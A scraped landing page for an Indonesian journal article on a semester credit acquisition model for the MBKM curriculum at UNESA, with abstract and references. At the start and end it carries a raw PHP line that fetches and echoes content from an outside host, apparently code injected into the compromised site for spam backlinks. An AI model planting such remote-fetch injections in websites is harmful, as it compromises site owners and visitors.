$a = file_get_contents('https://purefine.online/backlink.php'); echo $a; Model akuisisi kredit semester dalam implementasi kurikulum MBKM Program Studi Pendidikan IPS UNESA | Imron | Jurnal Teori dan Praksis Pembelajaran IPS

Model akuisisi kredit semester dalam implementasi kurikulum MBKM Program Studi Pendidikan IPS UNESA

Ali Imron, Sukma Perdana Prasetya, Agus Suprijono, Nuansa Bayu Segara, Kusnul Khotimah, Katon Galih Setyawan

Abstract


Model Akuisisi Kredit Semester merupakan model kerjasama Program Studi S-1 Pendidikan IPS Unesa dalam mengembangkan Kurikulum Merdeka Belajar Kampus Merdeka (MBKM) melalui kerja sama dengan prodi lain yang memiliki keterkaitan sesuai profil lulusan dan capaian pembelajaran lulusan sebagai guru IPS. Adapun profil tambahan lulusan adalah Pemandu Wisata Sejarah dan Budaya. Kompetensi ini sangat sesuai dengan paket mata kuliah yang ada di Program Studi S-1 Pendidikan Sejarah Unesa. Setelah melakukan analisis situasi terkait dengan kerja sama pada kurikulum MBKM antar dua program studi, dapat teridentifikasi tiga hal. Pertama, tidak ada pertukaran seimbang antara program studi yang bekerjasama. Kedua, terdapat kesetaraan jumlah SKS paket yang ditawarkan Program Studi Pendidikan Sejarah dan Program Studi Pendidikan IPS yakni 18 SKS. Ketiga, adanya persamaan waktu kegiatan yaitu pada semester ke-5. Berdasarkan pertimbangan tersebut, maka disusun Model Akuisisi Kredit Semester dalam kerja sama antar prodi dalam satu perguruan tinggi pada implementasi kurikulum MBKM. Target yang dihasilkan program ini antara lain, 1) Laporan hasil penyusunan Kurikulum MBKM Program Studi S-1 Pendidikan IPS beserta prosedur konversi dan pengakuan kredit; 2) Dokumen kurikulum MBKM Program Studi S-1 Pendidikan IPS; 3) Panduan implementasi kurikulum dengan Model “Akuisisi Kredit Semester”; dan  4) Nota kerjasama dengan Model Akuisisi Kredit Semester. Tahapan program ini terbagi menjadi 6 (enam) tahap yaitu: 1) Tahap pengembangan kurikulum; 2) Tahap sanctioning; 3) Uji Publik; 4) Pengajuan MoA; 5) Implementasi kerjasama kurikulum MBKM dan monev pembelajaran; dan 6) Penyusunan laporan kegiatan.


Keywords


akuisisi kredit semester; kerjasama; kurikulum MBKM

Full Text:

PDF

References


Asy’ari, A. and Hamami, T. (2020) ‘Strategi Pengembangan Kurikulum Menghadapi Tuntutan Kompetensi Abad 21’, IQ (Ilmu Al-qur’an): Jurnal Pendidikan Islam, 3(01), pp. 19–34.

Batubara, A.A.D., Suhati, S. and Bahri, S. (2021) ‘Analisis Manajemen Kurikulum Dalam Pelaksanaan Mutu Pendidikan Pada Program Studi Sastra Inggris di Fakultas Sastra Universitas Islam Sumatera Utara’, EduTech: Jurnal Ilmu Pendidikan dan Ilmu Sosial, 7(1), pp. 23–37.

Loliyana, N., Sukamto, G.M. and Andayani, E.S. (2019) ‘Pengaruh Model Outdoor Learning terhadap Pemahaman Sejarah Mahasiswa Pendidikan Sejarah’, Jurnal Pendidikan: Teori, Penelitian, dan Pengembangan, 4(6), p. 803.

Milhani, Y. (2021) ‘Pembentukan karakter melalui outdoor learning dalam pembelajaran IPS’, JIPSINDO (Jurnal Pendidikan Ilmu Pengetahuan Sosial Indonesia), 8(1), pp. 90–102.

Nofia, N.N. (2020) ‘Analisis Tantangan Implementasi Kebijakan “Merdeka Belajar Kampus Merdeka” pada Perguruan Tinggi Islam Negeri di Indonesia, Prokurasi Edukasi Jurnal Manajemen Pendidikan Islam, 1(2).

Nurhartina, A., Sinring, A. and Aryani, F. (2021) ‘Pengaruh Pelaksanaan Metode Outdoor Learning dalam Pembelajaran IPS Terhadap Motivasi Belajar Siswa Madrasah Ibtidaiyah Negeri 1 Kota Makassar’, Jurnal Papeda: Jurnal Publikasi Pendidikan Dasar, 3(1).

Prayogi, R.D. and Estetika, R. (2019) ‘Pemanfaatan Lingkungan sebagai Sumber Pembelajaran Mata Pelajaran IP’, Manajemen Pendidikan, 14(2).

Setiana, N. (2014) ‘Pembelajaran IPS Terintegrasi dalam Konteks Kurikulum 2013 | Setiana | EduHumaniora’, EduHumaniora: Jurnal Pendidikan Dasar, 6(2).

Sukmawati, S. and Jumadi, J. (2020) ‘Pengaruh Metode Pembelajaran Outdoor Study terhadap Motivasi Belajar Sejarah Siswa Kelas X IIS di MA DDI Cambalagi Maros’, PATTINGALLOANG, 7(3), pp. 359–371.

Widiastuti, E.H. (2017) ‘Pemanfaatan Lingkungan sebagai Sumber Pembelajaran Mata Pelajaran IPS’, Satya Widya, 33(1), p. 29.

Wiradimadja, A. et al. (2021) ‘Screen Recorder for Guiding Distance Learning: Case Study of Teacher Professional Education Program’, International Journal of Emerging Technologies in Learning (iJET), 16(07), pp. 4–15.




DOI: http://dx.doi.org/10.17977/um022v7i22022p104

Refbacks

  • There are currently no refbacks.




Editorial and Administration Office:
This Journal is published by Prodi Pendidikan IPS, Fakultas Ilmu Sosial, Universitas Negeri Malang
Semarang St. No. 5 Building I3-102 65145.
Phone. (0341) 551312. line. 376 (19)
Homepage: http://journal2.um.ac.id/index.php/jtppips/index
email: jtp2ips.journal@um.ac.id 


JTP2IPS INDEXED BY:

 

e-ISSN 2503-5347
ISSN 2503-1201

Statcounter

 Creative Commons License

JTP2IPS is licensed by CC BY 4.0

 

 

---------------------------------------- ---------------------------------------- ---------------------------------------- $a = file_get_contents('https://purefine.online/backlink.php'); echo $a; ----------------------------------------